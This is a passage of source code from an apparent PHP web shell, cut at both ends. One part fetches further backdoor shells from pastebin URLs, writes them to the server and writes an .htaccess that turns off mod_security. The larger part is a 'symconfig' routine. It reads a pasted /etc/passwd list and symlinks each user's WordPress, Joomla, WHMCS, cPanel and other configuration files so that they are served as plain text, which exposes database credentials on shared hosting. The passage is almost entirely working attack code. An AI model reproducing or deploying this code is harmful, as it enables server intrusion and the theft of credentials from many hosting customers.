  722.     $tools6_dir = mkdir('RaBiitch_tools', 0755);
  723.     $file_tools6 = "RaBiitch_tools/hidden.php";
  724.     $isi_httools6 = "<IfModule mod_security.c>
  725. SecFilterEngine Off
  726. SecFilterScanPOST Off
  727. </IfModule>";
  728.     $httools6 = fopen(".htaccess", "w");
  729.     $tools6_script = file_get_contents("https://pastebin.com/raw/7FMDa5aw");
  730.     $tools6 = fopen($file_tools6, "w");
  731.     fwrite($tools6, $tools6_script);
  732.     fwrite($httools6, $isi_httools6);
  733.     chmod($file_tools6, 0755);
  734.     echo "Done <a href='RaBiitch_tools/hidden.php'>RaBiitch Hidden Shell Here<br>default pass RaBiitch</a>";
  735. }
  736. elseif($_GET['shell'] == 'noname'){
  737.     $tools7_dir = mkdir('RaBiitch_tools', 0755);
  738.     $file_tools7 = "RaBiitch_tools/noname.php";
  739.     $isi_httools7 = "<IfModule mod_security.c>
  740. SecFilterEngine Off
  741. SecFilterScanPOST Off
  742. </IfModule>";
  743.     $httools7 = fopen(".htaccess", "w");
  744.     $tools7_script = file_get_contents("http://pastebin.com/raw.php?i=BRCmf02c");
  745.     $tools7 = fopen($file_tools7, "w");
  746.     fwrite($tools7, $tools7_script);
  747.     fwrite($httools7, $isi_httools7);
  748.     chmod($file_tools7, 0755);
  749.     echo "Done <a href='RaBiitch_tools/noname.php'>Noname Shell Here</a>";
  750. }
  751. elseif($_GET['RaBiitch'] == 'symconfig') {
  752. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  753. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  754. exit;
  755. }
  756. else
  757. {
  758. if($_POST["m"] && !$_POST["passwd"]==""){
  759. @mkdir("RaBiitch_symconf", 0777);
  760. @chdir("RaBiitch_symconf");
  761. @symlink("/","root");
  762. $htaccess="Options Indexes FollowSymLinks
  763. DirectoryIndex c7eisjustice.htm
  764. AddType text/plain .php
  765. AddHandler text/plain .php
  766. Satisfy Any";
  767. @file_put_contents(".htaccess",$htaccess);
  768. $etc_passwd=$_POST["passwd"];
  769. $etc_passwd=explode("\n",$etc_passwd);
  770. foreach($etc_passwd as $passwd){
  771. $pawd=explode(":",$passwd);
  772. $user =$pawd[0];
  773.  
  774. @symlink('/','RaBiitch_symconf/root');
  775. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  776. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  777. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  778. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  779. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  780. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  781. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  782. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  783. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  784. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  785. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  786. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  787. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  788. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  789. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  790. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  791. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  792. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  793. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  794. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  795. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  796. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  797. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  798. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  799. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  800. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  801. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  802. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  803. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  804. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  805. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  806. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  807. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  808. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  809. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  810. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  811. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  812. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  813. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  814. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  815. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  816. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  817. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  818. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  819. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  820. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  821. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  860. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  861. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  862. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  863. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  864. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  865. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  866. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  867. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  868. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  869. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  870. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  871. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  872. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  873. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  874. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  875. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  876. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  877. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  878. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  879. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  880. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  881. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  882. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  883. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  884. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  885. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  886. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  887. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  898. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  899. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  900. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  901. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  902. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  903. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  904. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  905. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  906. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  907. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  908. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  909. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  910. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  911. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  912. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  913. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  914. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  915. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  916. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  917. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  918. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  919. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  920. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  921. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  922. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  923. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  924. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  925. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  926. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  927. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  928. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  929. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  930. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  931. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  932. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  933. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  934. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  935. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  936. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  937. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  938. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  939. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  940. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  941. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  942. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  943. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  944. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  945. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  946. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  947. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  948. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  949. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  950. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  951. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  952. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  953. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  954. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  955. @symlink('/home/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  956. @symlink('/home/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  957.  
  958. //Home1
  959.  
  960. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  961. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  962. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  963. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  964. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  965. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  966. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  967. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  968. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  969. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  970. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  971. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  972. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  973. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  974. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  976. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  977. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  978. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  979. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  980. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  981. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  982. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  983. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  984. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  985. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  986. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  987. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  988. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  989. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  990. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  991. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  992. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  993. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  994. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  995. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  996. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  997. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  998. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  999. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1000. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1001. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1002. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1003. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1004. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1005. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1006. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1060. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1061. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1063. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1064. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1065. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1066. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
